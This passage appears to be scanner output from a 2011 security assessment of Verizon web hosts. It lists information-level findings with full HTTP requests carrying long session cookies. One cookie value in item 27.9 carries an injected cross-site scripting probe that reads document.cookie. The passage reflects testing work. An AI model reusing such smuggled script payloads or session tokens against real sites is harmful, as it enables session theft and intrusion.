...[SNIP]...

27.3. http://newscenter.verizon.com/assets/igallery/ESPN3.JPG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newscenter.verizon.com
Path:   /assets/igallery/ESPN3.JPG

Request

GET /assets/igallery/ESPN3.JPG HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 1
Date: Mon, 05 Sep 2011 22:43:19 GMT
Connection: Keep-Alive
Via: NS-CACHE-6.0: 62
ETag: "/fGKYZ/MZ43"
Server: Resin/3.1.8
Last-Modified: Mon, 02 May 2011 21:17:53 GMT
Content-Length: 1484

...[SNIP]...

27.4. http://webmail.verizon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: webmail.verizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N; webmail_ad="ad=1"; lob=webmail

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"766-1297453846000"
Last-Modified: Fri, 11 Feb 2011 19:50:46 GMT
Content-Length: 766
Date: Mon, 05 Sep 2011 22:18:51 GMT

...[SNIP]...

27.5. http://webmail.verizon.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webmail_ad="ad=1"; lob=webmail; WT_FPC=id=2a58c7583c8b5978c401315268334507:lv=1315268334507:ss=1315268334507; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"766-1297453846000"
Last-Modified: Fri, 11 Feb 2011 19:50:46 GMT
Content-Length: 766
Date: Mon, 05 Sep 2011 22:19:12 GMT

...[SNIP]...

27.6. http://www22.verizon.com/includes/javascript/pagetracker.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /includes/javascript/pagetracker.js

Request

GET /includes/javascript/pagetracker.js HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 5484
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close


var clickEvents='';
var tempX='';
var tempY='';
if(navigator.appVersion.indexOf('MSIE')>0){
   document.onmousedown=IEPouseClick;
   document.onkeydown=IEKeyDown;
}else{
   window.onmousedown=NSPou
...[SNIP]...

27.7. https://www22.verizon.com/includes/javascript/hbx.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx.js/

Request

GET /includes/javascript/hbx.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:42 GMT
Content-Length: 16426
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:42 GMT; path=/includes/; domain=verizon.com


//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/*
...[SNIP]...

27.8. https://www22.verizon.com/includes/javascript/hbx_custom.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx_custom.js/

Request

GET /includes/javascript/hbx_custom.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 19482
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


if(typeof(ghfT)=='undefined'){var ghfT='noscb';}

function fObj(n,d){
   var p,i,x;if(!d)d=document;if((p=n.indexOf('?'))>0&&parent.frames.length){
   d=parent.frames[n.substring(p+1)].document;n=n.
...[SNIP]...

27.9. https://www22.verizon.com/includes/javascript/hbx_dupreq.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx_dupreq.js

Request

GET /includes/javascript/hbx_dupreq.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660; lob=dotcom

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:42:09 GMT
Content-Length: 934
Connection: keep-alive


var vs_im=new Image();
function _hbOnPostPV(a){
   var i0=a.indexOf('cd=');
   var i1=i0-1;
   var i2=a.indexOf('c1=')
   var i3= i2-1
   var x=a.substring(i0,i3);
   var j0=a.indexOf('c4=');
   var j1=a.
...[SNIP]...

27.10. https://www22.verizon.com/includes/javascript/pagetracker.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/pagetracker.js

Request

GET /includes/javascript/pagetracker.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; 
RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:24:58 GMT
Content-Length: 5484
Connection: keep-alive


var clickEvents='';
var tempX='';
var tempY='';
if(navigator.appVersion.indexOf('MSIE')>0){
   document.onmousedown=IEPouseClick;
   document.onkeydown=IEKeyDown;
}else{
   window.onmousedown=NSPou
...[SNIP]...

27.11. https://www22.verizon.com/includes/javascript/scb.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/scb.js

Request

GET /includes/javascript/scb.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 4167
Date: Mon, 05 Sep 2011 22:21:57 GMT
Connection: keep-alive


var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* headerlogin.js */

/* ***** GLOBALS ***** */

var DIVOff=-250;
...[SNIP]...

27.12. https://www22.verizon.com/includes/javascript/scb31.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/scb31.js

Request

GET /includes/javascript/scb31.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
